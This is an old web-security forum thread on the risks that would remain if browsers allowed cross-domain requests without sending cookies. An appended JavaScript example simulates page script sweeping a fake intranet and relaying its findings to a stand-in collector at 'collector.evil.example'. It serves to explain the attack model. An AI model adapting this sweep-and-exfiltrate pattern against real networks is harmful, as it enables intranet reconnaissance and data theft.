Q and A on cross-site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For session fixation, hijacking, lockout, replay, session riding, etc.
Risks of cross-domain without cookies
Posted by: riahmatic
Date: November 15, 2008 10:50AM

Let's say browsers didn't send any cookies when embedding content (img, script, CSS, video) across domains and allowed cross-domain requests on anything. So your client-side code would have the same reach as server-side code and the same restrictions, having no session cookies. What are the flaws with this model - any new risks? I couldn't come up with anything good.

Re: Risks of cross-domain without cookies
Posted by: DoctorDan
Date: November 22, 2008 01:52AM

I can't think of anything off the top of my head. I mean, that makes it 100% stateless, right? I'm interested to hear some thoughts on this, actually.

-Dan

Re: Risks of cross-domain without cookies
Posted by: Gorka
Date: November 22, 2008 08:12PM

Well, if you actually had the same reach as server-side code, what could stop you from injecting server-side code to gain access to everything?

Cheers

Re: Risks of cross-domain without cookies
Posted by: riahmatic
Date: November 25, 2008 01:35PM

Okay, I have something. The client-side code would still have access to local intranet resources, whereas the server-side code wouldn't, so the reach actually isn't the same. Even though they are both stateless, the client-side code can load anything off the intranet unless it's locked down. Any unsecured files and forms could be requested. So not sending cookies doesn't seem to be enough protection here...

Re: Risks of cross-domain without cookies
Posted by: ademix
Date: August 04, 2009 02:52PM

You can also use it to proxy your requests.

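The two replies above (riahmatic's point that page script still reaches the intranet, and ademix's point that the page can then proxy what it reads) as an added worked example that is not code from this thread. It models the hypothetical browser rule from the opening post: cross-domain requests are allowed, cookies are never attached, and the response body is readable. The same /24 sweep is run from two positions, page script in the victim's browser and the attacker's own server, and the browser-side findings are relayed to a collector. The fake LAN, the 10.0.0.x addresses, the paths, the collector URL and the `captured` array are all constructed for the demo; nothing here touches a real network.

```javascript
// Added example, not code from this thread. It models the browser rule riahmatic
// proposes (cross-domain requests allowed, cookies never attached, response body
// readable by the page) and runs one intranet sweep from two positions: page script
// in the victim's browser, and the attacker's own server. The fake LAN, the
// addresses, the paths and the collector URL are all constructed for the demo.

// Constructed fake LAN as seen from a browser inside the office network. None of
// these handlers looks at cookies, so withholding cookies changes nothing here.
const FAKE_LAN = {
  "http://10.0.0.5/": "<h1>Intranet wiki</h1><a href=/hr/salaries.xls>",
  "http://10.0.0.9/printer/config": "snmp-community=public; admin-password=",
  "http://10.0.0.12/login": "<form method=post action=/login>",
};

// RFC 1918 and loopback ranges, used to model why the attacker's server (outside
// the LAN) cannot route to the victim's intranet.
function isPrivateIPv4(host) {
  const m = /^(\d+)\.(\d+)\.(\d+)\.(\d+)$/.exec(host);
  if (!m) return false;
  const a = Number(m[1]);
  const b = Number(m[2]);
  return a === 10 || a === 127 ||
    (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168);
}

// A request issued by page script under the hypothetical rule: the browser refuses
// anything but credentials: "omit", and an unreachable host throws, as fetch does.
function pageRequest(url, init = {}) {
  if (init.credentials !== "omit") throw new Error("model never sends cookies");
  const body = FAKE_LAN[url];
  if (body === undefined) throw new TypeError("Failed to fetch"); // no host / refused
  return { status: 200, body };
}

// The same request issued from the attacker's server, where private addresses
// simply do not route. Public targets are not modelled.
function serverRequest(url, init = {}) {
  const host = new URL(url).hostname;
  if (isPrivateIPv4(host)) throw new Error(`no route to host ${host}`);
  return pageRequest(url, { ...init, credentials: "omit" });
}

// Sweep a /24 for a few paths, keeping whatever answers 200. The request function
// is injected so the same sweep can be run from either position.
function scanIntranet(request, prefix, paths) {
  const findings = [];
  for (let i = 1; i < 255; i++) {
    for (const p of paths) {
      const url = `http://${prefix}.${i}${p}`;
      try {
        const r = request(url, { credentials: "omit" });
        if (r.status === 200) findings.push({ url, snippet: r.body.slice(0, 40) });
      } catch (e) {
        // no host, connection refused or no route: move on
      }
    }
  }
  return findings;
}

// ademix's point: the page can then relay what it read. The collector is a
// constructed attacker endpoint; `captured` stands in for its server log.
const COLLECTOR = "https://collector.evil.example/drop";
const captured = [];
function postToCollector(findings) {
  captured.push({ to: COLLECTOR, body: JSON.stringify(findings) });
  return captured.length;
}

// Run the sweep from both positions and relay the browser-side result.
// Usage: const { fromBrowser, fromServer } = compareReach();
function compareReach() {
  const paths = ["/", "/printer/config", "/login"];
  const fromBrowser = scanIntranet(pageRequest, "10.0.0", paths);
  const fromServer = scanIntranet(serverRequest, "10.0.0", paths);
  postToCollector(fromBrowser);
  return { fromBrowser, fromServer };
}
```

`compareReach()` returns three findings from the browser position and none from the server position, and the browser-side findings end up at the collector without a single cookie having been sent. That is the asymmetry riahmatic describes: what the session cookie protects is the user's authenticated state, while what lets the page read the printer config is the victim's network position, which the no-cookie rule does nothing about.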